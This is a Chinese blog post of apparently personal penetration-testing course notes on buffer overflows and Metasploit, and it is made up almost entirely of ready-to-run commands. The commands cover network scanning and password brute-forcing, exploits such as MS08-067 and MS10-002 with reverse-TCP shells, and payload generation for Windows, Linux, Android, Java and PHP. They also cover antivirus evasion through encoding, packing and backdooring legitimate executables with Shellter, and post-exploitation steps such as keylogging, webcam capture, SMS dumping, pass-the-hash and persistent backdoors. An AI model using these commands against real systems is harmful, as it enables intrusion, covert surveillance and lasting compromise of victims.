网络安全 (九 缓冲区溢出&&metasploit)

于 2019-07-31 09:43:47 发布
阅读量810 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aidang/article/details/97888442
版权

缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据,就像往杯子里倒入了过量的水一样。

缓冲区可以更抽象地理解为一段可读写的内存区域,
缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。

使用安全的字符串操作函数
编写安全代码
输入数据验证(过滤)
指针完整性检查
第三方软件防御

渗透攻击(exploit)
测试者利用系统、程序或服务的漏洞进行攻击的一个过程

攻击载荷(payload)
攻击者在目标系统上执行的一段攻击代码,改代码具有反弹连接,创建用户,执行其他系统命令的功能

shellcode
在目标机器上运行的一段机器指令,成功执行后会返回一个shell

模块(module)
是指metasploit框架中所使用的一段软件代码组件

监听器(listener)
监听器是metasploit中用来等待接入网络连接的组件

开启数据库service postgresql statr

查看数据库状态 service postgresql status

运行msfconsole

查看数据库连接状态 db_connect

创建一个工作台 workspace -a test

删除工作台 workspace - d test

进入test工作台 Wordspace test

使用nmap db_nmap -sS 192.168.80.1 扫描主机

导出扫描结果 db_export 1.xml
导入扫描结果 db_import 1.xml

查看扫描结果 hosts

信息收集

开启msfconsole

  1. whois www.example.com
  2. nslookup

use auxiliary/scanner/ip/ipidseq #IPID序列扫描器,与nmap的-sI -O选项类似
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run

nmap连接数据库扫描
db_nmap -sS -A 192.168.2.123

db_services 查看扫描结果

使用portscan模块
search postscan
use auxiliary/scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run

特定扫描 smb_version模块:
use auxiliary/scanner/smb/smb_version 查找开启445端口的ip
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor

找mssql主机
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

搜索网站中的e-mail地址
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com (扫描域名)
run

ssh服务器扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

telnet服务
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

ftp主机扫描
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

扫ftp匿名登陆
use auxiliary/scanner/ftp/anonymos
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

ftp匿名登陆
登陆名称:anonymous
密码:空

扫描局域网中有哪些主机存活
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

扫网站目录(并不会扫描文件)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run

扫描SNMP主机
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

嗅探抓包
use auxiliary/sniffer/psnuffle
run

密码爆破

ssh密码
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit

telnet密码
search telnet_login
use auxiliray/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit

samba攻击
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit

mysql密码爆破
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit

search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit

tomcat攻击
search tomcat_mgr_login
show options
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit

漏洞利用模块

show targets 显示目标(os版本)

set TARGET 设置目标版本

exploit 开始漏洞攻击

session -l 列出会话

session -i 选择会话

session -k 结束会话

z 把会话放到后台

c 结束会话

show auxiliary 显示辅助模块

use 使用辅助模块

set 设置选项

run 运行模块

ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128 (生成恶意网址的IP(可以代理))
set payload windows/meterpreter/reverse_tcp (反弹shell)
set SRVPORT 80 (反弹回来的端口)
set URIPATH /
set LHOST 192.168.2.128 (用于监听的地址)
set LPORT 1211 (用于监听的端口)
exploit

sessions -i (查看是否存在会话)

sessions -i 1 (选择一个ID,进入会话)
直接输入shell 即可得到shell

ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit

sessions -i (查看是否存在会话)

sessions -i 1 (选择一个ID,进入会话)

因为payload的不同,所以这个直接进入了shell

ms12_020
search ms12_020
use auxiliary/scanner/rdb/ms12_020_check (检查是否存在ms12_020漏洞)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50

back

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run

ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRBHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit

ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show target
set target 34
exploit

shellcode

windows

生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe

监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

linux

生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer


监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

andriod

生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk


监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

dump_contacts   导出电话
dump_sms        导出信息
Webcam_list	摄像头数目
-i 1		后置摄像头
webcam_snap 	拍照
webcam_stream	开启摄像头

java

生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar


监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1125

将生成得shellcode上传到目标机上

exploit

将生成得cracer.jar运行起来:
	    Java -jar cracer.jar运行起来

php

成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php


监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

shell免杀免杀

使用多重编码免杀
msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe

加壳免杀
upx -5 cc.exe

veil免杀

shellter免杀工具
shellcode代码注入工具
在一些正常得工具中,注入一些后门,实现免杀

  1. 首先使用Metasploit生成 payload
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw
  2. 执行wine shellter.exe 用红酒瓶运行我们的shellter,
  3. 这里A代表自动模式,PE target 是我们准备进行免杀的exe预注入文件位置
  4. 这里我们输入L命令开始选择载荷,我们这里就使用meterpreter_reverse_tcp载荷,输入1
  5. 输入我们的反弹shell的位置,接着键入我们需要监听的本地端口,这里我就选择1355作为监听端口,回车直接生成
  6. 启动Metasploit监听
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.3
    set lport 1355
    exploit
  7. 启动监听之后,把目录下的生成得文件放置 windows 电脑下运行即可主机上线

后渗透

1.生成一个木马
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. 进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
木马在目标机执行

  1. 操作命令

截屏 screenshot 会将生成得图片放到主文件夹

获取系统运行得平台 sysinfo

获取键盘记录
keyscan_start 开始
keyscan_dump 输出
keyscan_stop 结束

ps查看进程

migrate 1774切换进程 (在成功得入侵到目标机上第一件事就是要切换到稳定得进程,这样即便程序被关闭,也会进行控制)

run post/windows/capture/keylog_recorder 记录键盘记录

获取hash----hashdump

利用hash登陆
use exploit/windwows/smb/psexec
set payload windwos/metpreter/reverse_tcp
set LHOST 192.168.2.133
SET RHOST 192.168.2.131 (目标)
show options
set LPORT 1212
set SMBUser administrator 获取hash中都可以得到这些数值 smbuser smbpass
set SMBPass asdasdqwsda1313
show options
exploit

进程迁移 run post/windows/manage/migrate (自行切换到稳定进程)
run killav 关闭cmd.exe
查看目标机所有流量 run packetrecorder -i 1
提取系统信息 run scraper

持久控制PC机 (开机自启)
run persistence -X -i 50 -p 1121 -r 192.168.2.133 (往目标得注册表里写入某些数据)

msfcosole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
session -u 2 升级shell变成meterpreter

永久控制服务器

msfpaylaod windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
生成得payload放到目标机上

msfcosole
use exploit/multi/handler
set payload windows/meterpreter/metsvc_bin_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit

运行payload

run metsvc -A //安装永久后门

重启后
msfcosole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337 //固定得端口
exploit

Aidang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2019网络空间安全国赛8080缓冲区溢出漏洞
12-28
2019“网络空间安全”赛项二阶段Linux 8080 端口缓冲区溢出 一、扫描靶机开放端口 二、扫描服务版本信息 三、浏览器打开 四、利用
网络安全系列之三十五 缓冲区溢出
weixin_33881041的博客
11-14 223
缓冲区溢出的大名可谓如雷贯耳,我们不必去探究缓冲区溢出的原理,只需知道他能做什么就可以了。如果能够成功地对远程计算机进行缓冲区溢出,那么就可以获得远程计算机的Shell,也就可以直接以管理员的身份在远程计算机上执行各种命令,也就是说,远程计算机就成为了肉鸡。 要成功进行缓冲区溢出,前提是要求计算机上必须存在有漏洞。微软针对Windows系统的漏洞有一套命...
网络安全学习第7篇 - 缓冲区溢出
一清道长的个人博客
05-14 265
代码: #include "windows.h" #include "stdio.h" #include "string.h" char name[] = "\x41\x41\x41\x41\x41\x41\x41\x41" // name[0]~name[7] "\x41\x41\x41\x41" // EBP "\x79\x5b\x...
渗透之——使用Metasploit实现对缓冲区栈的溢出攻击
冰河的专栏
01-15 5474
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86494568 这里我们不说理论,只讲实战,以Metasploit溢出bof-server.exe为例。 1.下载工具 这里需要下载bof-server.exe和ImmunityDebugger bof-server.exe 下载地址为:http://redstack.ne...
缓冲区溢出攻击框架Metasploit
Uchiha Itachi 的专栏
05-16 2234
置顶便笺: 缓冲区溢出攻击框架Metasploit1、Metasploit是这样的架构,它如一条流水生产线一样,从攻击程序集中选择你要使用的攻击程序(当然也可以开发你自己的攻击程序),然后从有效载荷集(也就是攻击成功后想要执行的代码或程序,如shell)中选择一个有效载荷,然后配置目录信息,这样封装完后就可以对目标进行攻击。2、防御缓冲区溢出攻击Solaris和HP-UX系统中可以配置内核为不能从
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。...
StackAttack:利用基于堆栈的缓冲区溢出的Python程序
02-25
用python3编写的工具,用于利用基于堆栈的简单缓冲区溢出。 该工具包含8个功能,可帮助利用缓冲区溢出漏洞。 我创建了此工具,以便为从事OSCP认证工作的人员节省更多时间。 由于更容易实现(即通过套接字发送ascii...
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
09-23
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
Metasploit网络攻击样例解析.pptx
01-05
网络渗透攻击与普通网络攻击的不同在于它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。为了实现渗透攻击,攻击者采用的攻击方式绝不仅此于一种简单的Web脚本...
metasploit漏洞扫描器.txt
03-18
metasploit漏洞扫描器.txt
Linux及安全实验一:缓冲区溢出漏洞实验
biu的博客
09-21 834
Linux及安全实验一:缓冲区溢出漏洞实验https://www.cnblogs.com/zkzkzkzkzk/p/4450398.html https://www.cnblogs.com/feng886779/p/8618154.html
Exploit之初识Linux下缓冲区溢出
dfdhxb995397的博客
08-31 150
本文的目的不是为了介绍如何进行恶意的破坏性活动,而是为了教会你如何去防御此类破坏性活动,以帮助你扩大知识范围,完善自己的技能,如有读者运用本文所学技术从事破坏性活动,本人概不负责。 0×01 前言 1988年,世界上第一个缓冲区溢出攻击–Morris蠕虫在互联网上泛滥,短短一夜的时间全世界6000多台网络服务器瘫痪或半瘫痪,不计其数的数据和资料被毁。造成一场损失近亿美元的空前大劫难!...
第一个缓冲区溢出的全过程实践
giantbranch的专栏
10-25 4071
首发于:http://www.giantbranch.cn/myblog/?p=449 前言 缓冲区溢出大家估计听了不少了,但是实践过就更好了 为什么会出现缓存区溢出呢?(这里主要针对栈) 简单来说,首先局部变量,返回地址都是储存在栈上的,当我们的输入很长的一串字符,而且程序不检查长度就直接copy到局部变量上,那么局部变量就可以覆盖返回地址,控制漏洞函
2107381120 王孟丽 实验2 (1).docx
05-20
2107381120 王孟丽 实验2 (1).docx
Java项目如何打成可以运行Jar包
05-20
Java项目如何打成可以运行Jar包
node-v12.22.8-headers.tar.xz
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
海信 LED32K360X3D(0000)BOM1 自动重启问题软件升级数据 务必确认机编一致 强制刷机 整机USB升级程序
05-20
MT5505机芯升级方法: 1、下载数据,压缩包解压,升级软件文件夹名字为Hisense_5505,文件夹下包含“机型名.pkg”以及version.txt 2、将文件夹Hisense_5505,整个文件夹拷贝至U盘根目录下 3、电视关机,插入U盘(USB3或者靠近高频头的USB口),重新启动电视机,电视机自动检测到升级软件之后并进行升级 4、在升级过程中屏幕有相关提示,升级完成后能自动开机。(建议是升级完成之后拔下U盘设备以免下次开机进行重复性升级) 注意: 1、(U盘要求使用FAT32格式,建议4G-8G的品牌U盘,刷机成功率会高) 2、升级到结束,大约需要8-30分钟,中途绝对不能断电 3、升级重启第一次进入系统,请等完全正常进入开机桌面之后,才能拨下U盘 4、如无法升级,将Hisense 5505文件夹内“机型名.pkg”的文件重命名为“upgrade.pkg”,此时插上U盘开机,电视就会默认为强制升级模式
batik-awt-util-1.7.jar
05-20
Batik是为想使用svg格式图片来实现各种功能的应用程序和Applet提供的一个基于java的工具包
node-v14.10.1-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
缓冲区溢出实验kali
04-27
缓冲区溢出是一种常见的安全漏洞,攻击者通过向程序输入超出预分配缓冲区大小的数据,覆盖了相邻内存区域的内容,从而实现对程序的控制。Kali Linux是一款专门用于渗透测试和安全评估的操作系统,提供了丰富的工具和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值